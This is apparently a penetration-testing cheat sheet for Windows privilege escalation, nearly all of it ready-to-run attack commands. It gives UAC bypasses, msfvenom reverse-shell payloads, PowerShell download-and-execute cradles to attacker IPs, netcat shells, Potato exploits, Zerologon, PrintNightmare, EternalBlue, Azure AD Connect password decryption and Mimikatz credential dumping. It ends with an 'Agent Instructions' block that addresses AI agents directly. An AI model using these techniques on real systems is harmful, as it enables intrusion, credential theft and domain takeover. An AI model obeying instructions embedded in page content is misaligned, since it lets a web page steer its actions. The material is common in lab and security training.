# PrivilageEsc Windows ๐Ÿ‘‘ ## 01. Common Tricks ### 01.1 UAC Bypass * **DLL Hijacking UAC Bypass**. (SystemPropertiesAdvanced.exe) Click [here ](https://github.com/hfiref0x/UACME)for more! ```bash ## Source : https://egre55.github.io/system-properties-uac-bypass/ ## ------------------| Check if we are vuln? IWR http://10.10.14.38/sigcheck64.exe -outfile sigcheck.exe .\sigcheck.exe -accepteula -m C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe | findstr autoElevate ## If is true; we are good to go!! ## ------------------| Create backdoor dll file https://docs.h4rithd.com/tools/shells-payloads#09.-dll-hijack ## ------------------| Exploit copy srrstr.dll C:\Users\\appdata\local\microsoft\windowsapps\srrstr.dll cmd /c C:\Windows\SysWow64\SystemPropertiesAdvanced.exe ### If you get any error saying "This operation requires an interactive window". ### You should use any kind of C2 (Use GreatSCT/MSBuild to launch Meterpreter) ## ------------------| Use with interactive shell ### Create payload and gain shell using following methord ### https://docs.h4rithd.com/tools/shells-payloads#10.-greatsct ### migrate the process to explorer.exe meterpreter > ps -S explorer meterpreter > migrate meterpreter > shell cmd /c C:\Windows\SysWow64\SystemPropertiesAdvanced.exe ``` ### 01.2 If you have, in or can? * `AlwaysInstallElevated` check * [Check this article for more details.](https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/) ```bash ## ------------------| How to check reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer ## From the output that the registry named โ€œAlwaysInstallElevatedโ€ exists ## with a dword (REG_WORD) value of 0x1, ## which means that the AlwaysInstallElevated policy is enabled. ## Any user can run msi file. ## ------------------| Exploit ## Create msfvenom payload msfvenom -p windows/meterpreter/reverse_tcp lhost= lport= -f msi > pw3n.msi ## or msfvenom -p windows/x64/exec CMD="cmd /c powershell iex(new-object net.webclient).downloadstring('http://10.14.14.7/shell.ps1')" -f msi > pw3n.msi ## Execute the MSI package file on the Windows command prompt msiexec /quiet /qn /i pw3n.msi ## /quiet = Suppress any messages to the user during installation ## /qn = No GUI ## /i = Regular (vs. administrative) installation ``` * `SeBackupPrivilege` and `SeRestorePrivilege` has? ```bash ## ------------------| How to check is enabled whoami /all | findstr "SeBackupPrivilege SeRestorePrivilege" ## ------------------| Copy those SYSTEM Hives to current directory reg save HKLM\SYSTEM SYSTEM reg save HKLM\SAM SAM #### Then we need to copy Active Directory Domain Database also known as ntds.dit ## ------------------| Create diskshadow script on local set verbose on set metadata C:\Windows\Temp\meta.cab set context clientaccessible set context persistent begin backup add volume C: alias cdrive create expose %cdrive% E: end backup ## ------------------| Convert the script to Windows format and upload it. unix2dos script.txt ## ------------------| Use Diskshadow to backup C drive diskshadow.exe /s script.txt ## The entire file system can now be accessed via the E: drive ls E: ## ------------------| Use robocopy to backup the E:\Windows\ntds\ntds.dit file. robocopy /B E:\Windows\ntds\ .\ ntds.dit # Then download all SAM, SYSTEM and NTDS.DIT file then you can use secretsdump.py to get admini hash ## ------------------| Using wbadmin.exe ## Use archival smb on samba ## smb share and the share needs to be formated as NTFS/ReFS. follow below commands to do so. dd if=/dev/zero of=ntfs.disk bs=320M count=2 losetup -fP ntfs.disk losetup -a mkfs.ntfs /dev/loop0 mount /dev/loop0 ./ echo y | wbadmin start backup -backuptarget:\\10.10.14.22\share\ -include:c:\windows\ntds\ntds.dit ``` * If you has `SeLoadDriverPrivilege` ? ```bash ## ------------------| Download and upload following files to machine wget https://github.com/FuzzySecurity/Capcom-Rootkit/raw/master/Driver/Capcom.sys wget https://raw.githubusercontent.com/h4rithd/Precompiled-Binaries/main/Capcom/EoPLoadDriver.exe wget https://raw.githubusercontent.com/h4rithd/Precompiled-Binaries/main/Capcom/ExploitCapcom.exe ## ------------------| Create payload and upload msfvenom --platform windows -a x64 -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe > h4rithd.exe ## ------------------| Exploit copy h4rithd.exe C:\Windows\Temp\h4rithd.exe # Must need, then start listner .\ExploitCapcom.exe ``` * If the user is in `DnsAdmins` group? ```bash ## ------------------| Create payload msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f dll > h4rithd.dll ## ------------------| Create SMB share on local machine impacket-smbserver share ./ ## ------------------| Do this on owned remote box dnscmd.exe 127.0.0.1 /config /serverlevelplugindll \\\ sc.exe stop dns ## Create netcat listner and then sc.exe start dns ``` * If you have `GenericAll` on user jorden ```bash ## ------------------| Enable PreAuth for user Jorden Get-ADUser jorden | Set-ADAccountControl -DoesNotRequirePreAuth $true ## ------------------| Then run this impacket-GetNPUsers htb.local/jorden -dc-ip 192.168.3.203 -no-pass ``` * If you have `GenericWrite` on any services ```bash ## ------------------| Check the command sc.exe ## ------------------| If it is succcess then Exploit [Space must] sc.exe config UsoSVC binpath= "\"c:\windows\system32\cmd.exe /c powershell C:\\Windows\\system32\\spool\\drivers\\color\\rev.ps1\"" sc.exe stop UsoSVC sc.exe config UsoSVC start=auto sc.exe start UsoSVC ``` * If you have `xp_dirtree` ? ```bash ## Turn on responder sudo responder -i tun0 ## Execute sqlcmd -Q "xp_dirtree \\YourIP\test" ## Get the NTLM hash and crack with hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt ``` * If you are on `Azure Admins` group? ```bash ## Read this blog https://blog.xpnsec.com/azuread-connect-for-redteam/ ## Methodology $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Integrated Security=true;Initial Catalog=ADSync" $client.Open() $cmd = $client.CreateCommand() $cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration" $reader = $cmd.ExecuteReader() $reader.Read() | Out-Null $key_id = $reader.GetInt32(0) $instance_id = $reader.GetGuid(1) $entropy = $reader.GetGuid(2) $reader.Close() $cmd = $client.CreateCommand() $cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'" $reader = $cmd.ExecuteReader() $reader.Read() | Out-Null $config = $reader.GetString(0) $crypted = $reader.GetString(1) $reader.Close() add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll' $km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager $km.LoadKeySet($entropy, $instance_id, $key_id) $key = $null $km.GetActiveCredentialKey([ref]$key) $key2 = $null $km.GetKey(1, [ref]$key2) $decrypted = $null $key2.DecryptBase64ToString($crypted, [ref]$decrypted) $domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}} $username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}} $password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}} Write-Host ("Domain: " + $domain.Domain) Write-Host ("Username: " + $username.Username) Write-Host ("Password: " + $password.Password) ``` * If you are in member of `Event Log Readers` group. ```bash wget https://raw.githubusercontent.com/RamblingCookieMonster/PowerShell/master/Get-WinEventData.ps1 IEX(New-Object Net.WebClient).downloadString('http://10.10.14.25/Get-WinEventData.ps1') # Simple example showing the computer an event was generated on, the time, and any custom event data Get-WinEvent -LogName system -max 1 | Get-WinEventData | Select -Property MachineName, TimeCreated, e_* # Find lockout events on a domain controller Get-WinEvent -ComputerName DomainController1 -FilterHashtable @{Logname='security';id=4740} -MaxEvents 10 | Get-WinEventData | Select TimeCreated, e_TargetUserName, e_TargetDomainName # Command line process login (A new process has been created) Get-WinEvent -FilterHashtable @{Logname='security';id=4688} | Get-WinEventData | Select TimeCreated,MachineName,e_CommandLine | ft -autosize -wrap ## Check this out for windows event codes https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/default.aspx ``` * If you are on `WSUS Administrators` group? [SharpWSUS](https://github.com/nettitude/SharpWSUS) ```bash wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/SharpWSUS/SharpWSUS.exe wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/PsExec64/PsExec64.exe -O psexec.exe .\SharpWSUS.exe create /payload:"C:\Users\sflowers\Documents\psexec.exe" /args:"-accepteula -s -d -accepteula -s -d C:\\Users\\sflowers\\Documents\\nc.exe -e cmd 10.10.14.4 4545" /title:"LocalUpdate" .\SharpWSUS.exe approve /updateid: /computername: /groupname:"LocalUpdate" ### Wait for 5-6 minutes .\SharpWSUS.exe check /updateid: /computername: ``` * If you are member of `Administrators` group, but still stuck? ```bash ## List Administrators group members net localgroup Administrators ## Use this simple methord to bypass UAC net use h: \\127.0.0.1\c$ h: dir ``` * If you are in `LAPS_Readers` ```bash Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime $Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime $computers | Export-Csv -path c:\windows\temp\laps.csv" -NoTypeInformation ``` * Hijacking/Migrating login sessions. ```bash ## ------------------| Check who are logged into the machine, what sessions are available? tasklist /v ## ------------------| Get into a session ## Create payload msfvenom --platform windows -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe > h4rithd.exe sudo msfdb run use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST tun0 set LPORT run meterpreter > ps ## Search explorer.exe; becouse it's more stable then copy the PID value migrate ``` ### 01.3 Service / Registry Exploits * [Insecure Service Permissions](https://sohvaxus.github.io/content/winxp-sp1-privesc.html) ```bash ## ------------------| Enumarations [Must have SERVICE_START & SERVICE_STOP permissions] .\winPEASany.exe quiet servicesinfo Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr "Program" ## ------------------| Check Permissions icacls "C:\Program Files\...\\..\pro.exe" ### Check BUILTIN\Users:(I)(F) permission ## ------------------| Check for particular service name .\accesschk.exe /accepteula -uwcqv "Authenticated Users" * .\accesschk.exe /accepteula -uwcqv user accesschk.exe /accepteula -ucqv ## ------------------| Exploit ## Check current status sc qc sc query ## Set binary path sc config binpath= "\"C:\Windows\Temp\shell.exe\"" ## Start service net start sc STOP sc START ## Set automactic start sc config start= auto ## Remove dependancy sc config depend= "" ## ------------------| Restart service cmd wmic service where caption=" get name, caption, state, startmode ## if StartMode is Auto ## Check if we have restart machine privilages whoami /priv ``` * Insecure Service Executables ```bash ## ------------------| Check ### RW Everyone .\accesschk.exe /accepteula -quvw "C:\.exe" ### SERVICE_START & SERVICE_STOP permissions .\accesschk.exe /accepteula -uwcqv user ## ------------------| Exploit ## Backup origianl one then replace with shell.exe ## Start the service net start sc STOP sc START ``` * [Unquoted Service Path](https://pentestlab.blog/2017/03/09/unquoted-service-path/) ```bash ## ------------------| Intro C:\Program Files\One Folder\Two Folder\Executable.exe C:\Program.exe C:\Program Files\One.exe C:\Program Files\One Folder\Two.exe C:\Program Files\A Subfolder\Two Folder\Executable.exe ## ------------------| Check unqoted paths wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v "'" ## ------------------| Check if we have ### SERVICE_START & SERVICE_STOP permissions .\accesschk.exe /accepteula -uwcqv user ### Write permission [RW BUILTIN\Users] .\accesschk.exe /accepteula -uwcqv -uwdq ## ------------------| Replace & start service move payload.exe "C:\Program Files\...\\.exe" net start sc STOP sc START ``` * Weak Registry Permissions ```bash ## ------------------| Verify [Check for RW NT AUTHORITY\INTERACTIVE] Get-Acl HKLM:\\ | Format-List .\accesschk.exe /accepteula -uvwqk HKLM:\\ ## ------------------| Check if we can start the service .\accesschk.exe /accepteula -ucqv user ## ------------------| Check Current values [ImagePath & ObjectName == LocalSystem] reg query HKLM:\\ ## ------------------| Add new value reg add HKLM:\\ /v ImageaPath /t REG_EXPAND_SZ /d C:\Windows\Temp\shell.exe /f net start ``` ## 02. Tools ### 02.1 [PowerUp](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) ```bash ## ------------------| Download and execute C:\windows\sysnative\WindowsPowerShell\v1.0\powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26/PowerUp.ps1')" ## ------------------| Best check Invoke-AllChecks CurrentUserTokenGroupSid Get-RegistryAutoLogon ## ------------------| Check other functions cat PowerUp.ps1 | grep -Ei '^function' | grep '{$' | grep '-' | awk '{print $2}' ``` ### [02.2 PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) * [Click here for cheatsheet!!](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet) ```bash # Download wget https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1 # Upload IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26/PowerUpSQL.ps1') # Execute commands Get-SQLInstanceLocal -Verbose Invoke-SQLUncPathInjection -Verbose Invoke-SQLImpersonateService -Verbose Invoke-SQLEscalatePriv -Verbose $Targets | Invoke-SQLOSCLR -Verbose -Command "Whoami" $Targets | Invoke-SQLOSPython -Verbose -Command "Whoami" $Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem CmdExec -Command "echo hello > c:\windows\temp\test1.txt" $Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem PowerShell -Command 'write-output "hello world" | out-file c:\windows\temp\test2.txt' -Sleep 20 ``` ### 02.3 Seatbelt ```bash # Run ALL enumeration checks Seatbelt.exe -group=all ``` ### 02.4 **SecretsDump** ```bash ## ------------------| If you have SAM and SYSTEM files on your hand impacket-secretsdump -sam SAM -system SYSTEM local ## ------------------| Remote impacket-secretsdump htb.local/h4rithd:'Passw0rD$'@10.10.10.161 # 31d6cfe0d16ae931b73c59d7e0c089c0 <-- blank # aad3b435b51404eeaad3b435b51404ee <-- blank [LM] ## ------------------| Remote NTDS ## Copy ntds file robocopy /B C:\Windows\ntds .\ntds ntds.dit ## Copy sam and system file then run impacket-secretsdump -sam SAMFILE -system SYSTEMFILE -ntds NTDS.DIT local ## ------------------| Local NTDS impacket-secretsdump -system ntds.bin -ntds ntds.dit local ## ntds.bin: MS Windows registry file, NT/2000 or above ## ntds.dit: Extensible storage engine DataBase, version 0x620, checksum 0x16d44752, page size 8192, DirtyShutdown, Windows version 6.1 ``` ## 03. Common Exploits ### 03.0 [JuicyPotatoNG ](https://github.com/antonioCoco/JuicyPotatoNG)(New) ```bash ## ------------------| Verify the vulnerability whoami /priv | findstr "Enabled" # Check if "SeImpersonatePrivilege or SeAssignPrimaryToken is Enabled" we are good!! ๐Ÿ‘Œ๐Ÿ‘Œ๐Ÿ‘Œ ## ------------------| Download to local machine wget https://github.com/antonioCoco/JuicyPotatoNG/releases/download/v1.1/JuicyPotatoNG.zip unzip JuicyPotatoNG.zip ## ------------------| After upload it on victim's machine create bat file echo "powershell -EncodedCommand SQBFAFgAKABOA.....ApAA==" > shell.bat type C:\programdata\shell.bat ## ------------------| Run .\JuicyPotatoNG.exe -t * -p \shell.bat ``` ### 03.1 [Juicy Potato](https://github.com/ohpe/juicy-potato) (Abusing the golden privileges) ```bash ## ------------------| Verify the vulnerability whoami /priv | findstr "Enabled" # Check if "SeImpersonatePrivilege or SeAssignPrimaryToken is Enabled" we are good!! ๐Ÿ‘Œ๐Ÿ‘Œ๐Ÿ‘Œ ## ------------------| Create .bat script ## Shell through Netcat echo START C:\\nc.exe -e powershell.exe YourIP YourPort > sh3ll.bat ## Shell through Powershell cmd.exe /c powershell -ep bypass IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/rev.ps1') ## ------------------| List CLSID's .\JuicyPotato.exe -z -l 100 ## ------------------| Execute .\JuicyPotato.exe -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p C:\Users\Public\shell.bat -l 1337 .\JuicyPotato.exe -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p C:\Users\Public\shell.exe -l 1337 ## ------------------| General options # Mandatory args: -t createprocess call: CreateProcessWithTokenW, CreateProcessAsUser, <*> try both -p : program to launch -l : COM server listen port # Optional args: -m : COM server listen address (default 127.0.0.1) -a : command line argument to pass to program (default NULL) -k : RPC server ip address (default 127.0.0.1) -n : RPC server listen port (default 135) -c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097}) -z only test CLSID and print token's user ``` * Click [here ](https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md)to view CLSIDs ### 03.2 [RoguePotato ](https://github.com/antonioCoco/RoguePotato)([No more JuicyPotato? Old story, welcome RoguePotato!](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/)) ```bash ## ------------------| Run Chisel to bind port 9999 chisel server --reverse --port 1337 ## From Our end .\chisel64.exe client :1337 R:9999:localhost:9999 ## From Attackers end ## ------------------| Run socat to catch 135 sudo socat tcp-listen:135,reuseaddr,fork tcp:127.0.0.1:9999 ## From Our end ## ------------------| Execute RoguePotato .\RoguePotato.exe -r -e "powershell C:\Windows\Temp\rev.ps1" -l 9999 # or .\RoguePotato.exe -r -e "c:\windows\temp\h4rithd.exe" -l 9999 ``` ### 03.3 [MultiPotato](https://github.com/S3cur3Th1sSh1t/MultiPotato) ```bash ## ------------------| Download ### Bit 64 wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/MultiPotato/Multipotatox64.exe -O Multipotato.exe ### Bit 32 wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/MultiPotato/Multipotatox32.exe -O Multipotato.exe ## ------------------| BindShell with SpoolSample PipeName .\MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss" ## ------------------| CreateUser with modified PetitPotam trigger .\Multipotato.exe -t CreateUser ## ------------------| CreateProcessAsUserW with SpoolSample trigger .\Multipotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe" ``` ### 03.4 PrintSpoofer ```bash # !!! Microsoft Visual C++ Redistributable Must installed .\PrintSpoofer.exe -i -c "C:\\\shell.exe" ``` ### 03.5 [Zerologon | CVE 2020-1472](https://github.com/dirkjanm/CVE-2020-1472) ```bash git clone https://github.com/dirkjanm/CVE-2020-1472.git cd CVE-2020-1472 python3 cve-2020-1472-exploit.py MULTIMASTER 10.10.10.179 # if exploit complte, impacket-secretsdump -just-dc -no-pass MULTIMASTER\$@10.10.10.179 # Now you can login with this # '$' is used for machine account impacket-psexec Administrator@10.10.10.179 -hashes 69cbf4a9b7415c9e1caf93d51d971be0:69cbf4a9b7415c9e1caf93d51d971be0 ``` ### 03.6[ Fodhelper.exe - UAC Bypass](https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/) ```bash ## ------------------| CMD REG ADD HKCU\Software\Classes\ms-settings\shell\open\command REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /v DelegateExecute /t REG_SZ REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd.exe /c powershell -EncodedCommand SQBF..dgZFS==" /f C:\Windows\System32\fodhelper.exe ## ------------------| Powershell $program = "cmd.exe /c powershell -EncodedCommand SQBF..dgZFS==" New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden ## ------------------| Remove Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force ``` ### 03.7 Serviio Insecure File Permissions ```bash ## ------------------| Enumarations Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr Serviio icacls "C:\Program Files\Serviio\bin\ServiioService.exe" # Check if we have BUILTIN\Users:(I)(F) ## ------------------| Exploit move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe" move revshell.exe "C:\Program Files\Serviio\bin\ServiioService.exe" net stop Serviio ## or wmic service where caption="Serviio" get name, caption, state,startmode whoami /priv | findstr SeShutdownPrivilege ## Disabled OK shutdown /r /t 0 ``` ### 03.8 [PrintNightmare](https://github.com/calebstewart/CVE-2021-1675) ```bash ## ------------------| Verify vulnerability impacket-rpcdump @ | grep -A2 -B2 MS-RPRN ## ------------------| Download and execute wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1 Import-Module .\CVE-2021-1675.ps1 Invoke-Nightmare ## If you get any kind of errors like ExecutionPolicy; try with evil-winrm evil-winrm -i -u -p -s $(pwd) CVE-2021-1675.ps1 menu Invoke-Nightmare ## Then use psexec to login with new creds impacket-psexec adm1n:'P@ssw0rd'@ ``` ### 03.9 EternalBlue (MS17-010) ```bash ## ------------------| Check nmap -sV -Pn -p 445 --script smb-vuln-ms17-010 $IP ## ------------------| Setup git clone https://github.com/helviojunior/MS17-010.git && cd MS17-010 virtualenv -p python2 venv source venv/bin/activate pip2 install impacket pycrypto # This will get an error; that's fine python checker.py msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4545 -f exe > rev.exe ## ------------------| Method I python send_and_execute.py rev.exe ## ------------------| Method II ## Open zzz_exploit.py file and edit following lines service_exec(conn, r'cmd /c net user h4rithd Password123 /add') service_exec(conn, r'cmd /c net localgroup administrators h4rithd /add') python zzz_exploit.py ``` ### 03.10 [Windows-Exploit-Suggester WES-NG](https://github.com/bitsadmin/wesng) ```bash ## ------------------| Install git clone https://github.com/bitsadmin/wesng.git cd wesng chmod +x wes.py ## ------------------| Download latest definitions ./wes.py --update ./wes.py -u ## ------------------| Download latest version of WES-NG ./wes.py --update-wes ## ------------------| Determine vulnerabilities ./wes.py systeminfo.txt ## ------------------| Determine vulnerabilities using both systeminfo and qfe files ./wes.py systeminfo.txt qfe.txt ## ------------------| Determine vulnerabilities and output to file ./wes.py systeminfo.txt --output vulns.csv ./wes.py systeminfo.txt -o vulns.csv ## ------------------| Determine vulnerabilities explicitly specifying KBs to reduce false-positives ./wes.py systeminfo.txt --patches KB4345421 KB4487017 ./wes.py systeminfo.txt -p KB4345421 KB4487017 ## ------------------| Determine vulnerabilies filtering out out vulnerabilities of KBs that have been published before the publishing date of the most recent KB installed ./wes.py systeminfo.txt --usekbdate ./wes.py systeminfo.txt -d ## ------------------| Determine vulnerabilities explicitly specifying definitions file ./wes.py systeminfo.txt --definitions C:\tmp\mydefs.zip ## ------------------| List only vulnerabilities with exploits, excluding IE, Edge and Flash ./wes.py systeminfo.txt --exploits-only --hide "Internet Explorer" Edge Flash ./wes.py systeminfo.txt -e --hide "Internet Explorer" Edge Flash ## ------------------| Only show vulnerabilities of a certain impact ./wes.py systeminfo.txt --impact "Remote Code Execution" ./wes.py systeminfo.txt -i "Remote Code Execution" ## ------------------| Only show vulnerabilities of a certain severity ./wes.py systeminfo.txt --severity critical ./wes.py systeminfo.txt -s critical ## ------------------| Validate supersedence against Microsoft's online Update Catalog ./wes.py systeminfo.txt --muc-lookup ``` ### 03.11 Windows Kernel Exploits \*\*Download all the Binary Files from : \*\* #### Microsoft Windows - Local Privilege Escalation (MS15-051) ```bash wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip ``` #### `USBPcap` Null Pointer Dereference Privilege Escalation (CVE-2017-6178) ```bash ## ------------------| Information # Date - 07th March 2017 # Discovered by - Parvez Anwar (@parvezghh) # Vendor Homepage - http://desowin.org/usbpcap/ # Tested Version - 1.1.0.0 (USB Packet capture for Windows bundled with WireShark 2.2.5) # Driver Version - 1.1.0.0 - USBPcap.sys # Tested on OS - 32bit Windows 7 SP1 # Vendor fix url - not yet # Fixed Version - 0day # Fixed driver ver - 0day ## ------------------| Check Vulnarable Version driverquery /v | findstr USBPcap.sys type "C:\Program Files\USBPcap\USBPcap.inf" ## ------------------| Exploit curl -o exploit.c https://www.exploit-db.com/raw/41542 gcc.exe -c exploit.exe exploit.c ./exploit.exe ``` ## 04. [Mimikatz](https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210810-2) * More command available at [here!](https://docs.h4rithd.com/windows/smb-ad-enumeration#18.-mimikatz) * Dump all user's `ntlm` hashes using `lsass` ```bash .\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit" >> mimikatz-sam.out .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> mimikatz-logonpasswords.out ## ------------------| If you have lsass as Mini DuMP or Rekall pip3 install pypykatz pypykatz lsa minidump lsass.DMP --json ``` * Set password for account ```bash .\mimikatz.exe "lsadump::setntlm /user:USERNAME /ntlm:NTLMHASH" "exit" ``` * Decrypt EFS files. \[[source](https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files)] ```bash ## ------------------| Get file's Certificate Thumbprint value cipher /c c:\users\file.txt | Select-String "Certificate thumbprint" ## Also you can get this using following command. dir C:\Users\\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\ | Select Name ## ------------------| Getting the certificate .\mimikatz.exe "crypto::system /file:C:\Users\\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\ /export" "exit" ## Download the *.der file to your machine. ## ------------------| Getting the masterkey gci C:\Users\tolu\AppData\Roaming\Microsoft\protect\ gci -hidden C:\Users\tolu\AppData\Roaming\Microsoft\protect\\ .\mimikatz.exe "dpapi::masterkey /in:C:\Users\\AppData\Roaming\Microsoft\protect\\ /password:" "exit" ## ------------------| Decrypting the private key gci C:\Users\\AppData\Roaming\Microsoft\Crypto\RSA\ gci C:\Users\\AppData\Roaming\Microsoft\Crypto\RSA\\ .\mimikatz.exe "dpapi::capi /in:C:\Users\\AppData\Roaming\Microsoft\Crypto\RSA\ /masterkey:" "exit" ## Download the *.pvk file to your machine. ## ------------------| Building & Installing the correct PFX openssl x509 -inform DER -outform PEM -in *.der -out public.pem openssl rsa -inform PVK -outform PEM -in *.pvk -out private.pem openssl pkcs12 -in public.pem -inkey private.pem -password pass: -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx ## Copy the cert.pfx file to remote machine. certutil -user -p -importpfx cert.pfx NoChain,NoRoot ## ------------------| Data access type "c:\users\file.txt" ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://p0db0t.gitbook.io/pentest/windows/privilageesc-windows.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.